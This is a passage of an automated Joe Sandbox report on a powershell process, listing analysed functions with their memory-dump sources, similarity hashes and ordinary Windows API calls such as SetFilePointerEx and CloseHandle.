                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                                                                                                                                        • Opcode ID: a6be564071738f8b861bdf5a89a003954c55548e33662bf73028497d2efb45f7
                                                                                                                                                                                                                                                        • Instruction ID: eb3865b7021bdf9f8a65f72cf60e09803352e61aff9ba69bb9463a16effe1da5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6be564071738f8b861bdf5a89a003954c55548e33662bf73028497d2efb45f7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9831B173A18A858AE7108F25E440BA97760FB4C7C4F448031EA8E57759DF3CD665CB08
                                                                                                                                                                                                                                                        Function 00007FFB08162E3C Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,00007FFB081618E0,?,?,?,?,?,?,?,?,?,00007FFB08161A5F), ref: 00007FFB08162E80
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFB081618E0,?,?,?,?,?,?,?,?,?,00007FFB08161A5F), ref: 00007FFB08162E8A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: 9edde38f6ee4f926571c5aaa4321c83da55fabc91ff9e3dbe5bdad5d4ccad157
                                                                                                                                                                                                                                                        • Instruction ID: c60332547fbec9361da389c5ccb905e39c6120c94e911b5a996494f17b0ee191
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9edde38f6ee4f926571c5aaa4321c83da55fabc91ff9e3dbe5bdad5d4ccad157
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A10184A1B08A8245EE604B35F8448796650AF88BF0F545735EABE07BD9DE3CD561C704
                                                                                                                                                                                                                                                        Function 00007FFB0815ACA4 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        • Opcode ID: 1dbff9f303715214388b870250434bdd61fb96b8300dd43b68cf7e0278005ab6
                                                                                                                                                                                                                                                        • Instruction ID: 6e30a4f95c53fd02120bd9de5b060170546fca1a50a06781279661fbf300f76d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dbff9f303715214388b870250434bdd61fb96b8300dd43b68cf7e0278005ab6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0119091B4C6528AFFA46774E5A0A7C25815F8C7A4F144339DA6F472D6CE6CEA90C208
                                                                                                                                                                                                                                                        Function 00007FFB08160D34 Relevance: 1.6, APIs: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0a0ee3c46408c8cfb156ebb24292b244d4cdab12fc07d74d103241b5862902ae
                                                                                                                                                                                                                                                        • Instruction ID: 8f825811c1dfa76d2a3609d725b4864a303156ca43c5467f6de18373c6ec745e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0ee3c46408c8cfb156ebb24292b244d4cdab12fc07d74d103241b5862902ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C21E2F2E18A528AE2416B31D850B3E3650BF8C7A1F054634ED6D173C2CE7CEA51C718
                                                                                                                                                                                                                                                        Function 00007FFB08162D3E Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 592ffdbecbefa0f31a9447dc114d2efa711b9c0c6d64b71ba9b5ecf22bdbad2c
                                                                                                                                                                                                                                                        • Instruction ID: 3b88504bb3db93719b3f1197729ceae6c073511d3f7aecad3c3811430d1f1a8a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 592ffdbecbefa0f31a9447dc114d2efa711b9c0c6d64b71ba9b5ecf22bdbad2c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97212FF2E186568AE6426B31D850B7D3650AF087B1F454734D97E073C2CE7CEA52C318
                                                                                                                                                                                                                                                        Function 00007FFB08161314 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 0b91b918f31c147f5b00af9a0bfdad5dbabb41827ee2abadd0097675e99a40e5
                                                                                                                                                                                                                                                        • Instruction ID: 70b7949d8026c3c15f70e898daa34a288b9dbdb46881859f2818b6f5ac80969f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b91b918f31c147f5b00af9a0bfdad5dbabb41827ee2abadd0097675e99a40e5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9321D6B27187838BE7658F35E44077A76A0EF88BA4F144234DA9E87AD5DF2CD950C704
                                                                                                                                                                                                                                                        Function 00007FFB081568EC Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 5c5856398c86406ac81ea2047e6d64f8b7ae0db8e9d49b7294c2ba5ba9f290e1
                                                                                                                                                                                                                                                        • Instruction ID: bda382acdaeaf9420a2b77d72f59cd7a098f3786f82b12474c97e55f3263676a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c5856398c86406ac81ea2047e6d64f8b7ae0db8e9d49b7294c2ba5ba9f290e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E21A2E1A1C747C1FB115B31D801B7E63A0AF6CB90F948435EA4D8768AEF2DDA00C798
                                                                                                                                                                                                                                                        Function 00007FFB0815AC00 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ae59a5703033883849af25b4f8457e6abb6fe43705d67e1299966044ca1323c6
                                                                                                                                                                                                                                                        • Instruction ID: 4d4f59ae7f90adba0f619ae8a420c52428a2d223648393e0360c30d189078db0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae59a5703033883849af25b4f8457e6abb6fe43705d67e1299966044ca1323c6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05119EF2D08686CEEB059F70D4206AE77A0EF88761F904236EA4D062D5DF7CE601CB14
                                                                                                                                                                                                                                                        Function 00007FFB0815672C Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 880f8573670df0e63709a9aaee9acbdcbdc307d851fdd76ed19d557bbbabb9f1
                                                                                                                                                                                                                                                        • Instruction ID: 5ab48a02092e232c5d24b0c392f222f4758b725b846967a6e7ac73ea69ed2407
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880f8573670df0e63709a9aaee9acbdcbdc307d851fdd76ed19d557bbbabb9f1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA0162E1E49506C5FE14AB75E811B7D22909F9DB78F641730E92E872D2DE2CEA42C248
                                                                                                                                                                                                                                                        Function 00007FFB0815646C Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: f591c14f981b5324fbaec69524b2e81567ed40f9b856e1da689ff3a94bbf8af0
                                                                                                                                                                                                                                                        • Instruction ID: 2a8bd7ecca0481844d84cfc522fa69c6d9bd60953d5ec4e94b1f20c26857d0ad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f591c14f981b5324fbaec69524b2e81567ed40f9b856e1da689ff3a94bbf8af0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E011AFB6A11F15D9EB11CFB0E8804DD37B8FB1835CB900626EA5D12B59EF34D2A5C394
                                                                                                                                                                                                                                                        Function 00007FFB081563E0 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 4cbcbc91aecf9a79e6b4145c61adce09473d2c225b6e00b71349f17bf1553e66
                                                                                                                                                                                                                                                        • Instruction ID: 23f4c83330fbbc8f9045da1d022d454909109b97f35065034572f01d3067a72f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cbcbc91aecf9a79e6b4145c61adce09473d2c225b6e00b71349f17bf1553e66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2411AFB2A10B56D8EB11CFB0E8804DC37B8FB18358B900626EA5D12B58EF34C2A5C394
                                                                                                                                                                                                                                                        Function 00007FFB081544F8 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 1b5374a125a8ad0bf03559349f864e57b78f7b88a72b8880b0cc9b74e17bbe66
                                                                                                                                                                                                                                                        • Instruction ID: f016d391ced986eda95e6f8963b59c2f807010c55a3c2157faecbeb0db128739
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b5374a125a8ad0bf03559349f864e57b78f7b88a72b8880b0cc9b74e17bbe66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BF0AFF2918202C1EB64AB34C0817B927A1DF0DB24F141232CA0E0B3D6DE3ADAC1C72C
                                                                                                                                                                                                                                                        Function 00007FFB081567B0 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 9906e3779aa49ddbd79678d3dc499a961b0ec92300c65ac07c1964bdfd4bed5f
                                                                                                                                                                                                                                                        • Instruction ID: 4d991db5e6203777d7b1975adf7c01028f70b6117633a5cdcf966e32576ddd7d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9906e3779aa49ddbd79678d3dc499a961b0ec92300c65ac07c1964bdfd4bed5f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF0E2E1A0C207C6FA146779E8019BA23A49F6CBA0F544630E91EC72C7DE2CE652C658
                                                                                                                                                                                                                                                        Function 00007FFAAC68660A Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406887584.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac680000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 36cac979e11c808ab8e507ff43ca79f790e4c2827ab3c651c93d5790f120a9c4
                                                                                                                                                                                                                                                        • Instruction ID: ddcaff96c644dc92d1c4631e677fa3885f200272843e74cedf7b1e70e2aa0401
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36cac979e11c808ab8e507ff43ca79f790e4c2827ab3c651c93d5790f120a9c4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57C158B191EA898FFB56DB6888155B57BE1EF46310F4450BEE04DC70D3DE18E90983D2
                                                                                                                                                                                                                                                        Function 00007FFAAC5B94FA Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406557466.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac5b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d5a7b8f29cc0d408b0e1a3bca22a9301c953ed7e7cbb81653906625db2c0dc11
                                                                                                                                                                                                                                                        • Instruction ID: 75a131213aeca2466588c0b0c6e5e337314550518e96b0884958995869331300
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5a7b8f29cc0d408b0e1a3bca22a9301c953ed7e7cbb81653906625db2c0dc11
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DEC1086394EBC64FF3169B2C9C591A97FB0EF53224B0881FBD0C987193F919A40983D2
                                                                                                                                                                                                                                                        Function 00007FFAAC5B9DDB Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406557466.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
